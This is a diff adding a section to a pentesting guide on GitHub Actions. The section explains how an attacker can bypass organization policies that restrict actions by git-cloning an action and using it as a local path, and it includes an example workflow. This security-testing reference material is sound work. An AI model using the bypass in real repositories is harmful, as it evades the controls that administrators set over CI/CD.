f

Author: carlospolop

src/pentesting-ci-cd/github-security/abusing-github-actions/README.md

@@ -450,6 +450,33 @@ gh-actions-artifact-poisoning.md
 
 ## Post Exploitation from an Action
 
+### Github Action Policies Bypass
+
+As commented in [**this blog post**](https://blog.yossarian.net/2025/06/11/github-actions-policies-dumb-bypass), even if a repository or organization has a policy restricting the use of certain actions, an attacker could just download (`git clone`) and action inside the workflow and then reference it as a local action. As the policies doesn't affect local paths, **the action will be executed without any restriction.**
+
+Example:
+
+```yaml
+on: [push, pull_request]
+
+jobs:
+  test:
+    runs-on: ubuntu-latest
+    steps:
+      - run: |
+          mkdir -p ./tmp
+          git clone https://github.com/actions/checkout.git ./tmp/checkout
+
+      - uses: ./tmp/checkout
+        with:
+          repository: woodruffw/gha-hazmat
+          path: gha-hazmat
+
+      - run: ls && pwd
+
+      - run: ls tmp/checkout
+```
+
 ### Accessing AWS and GCP via OIDC
 
 Check the following pages: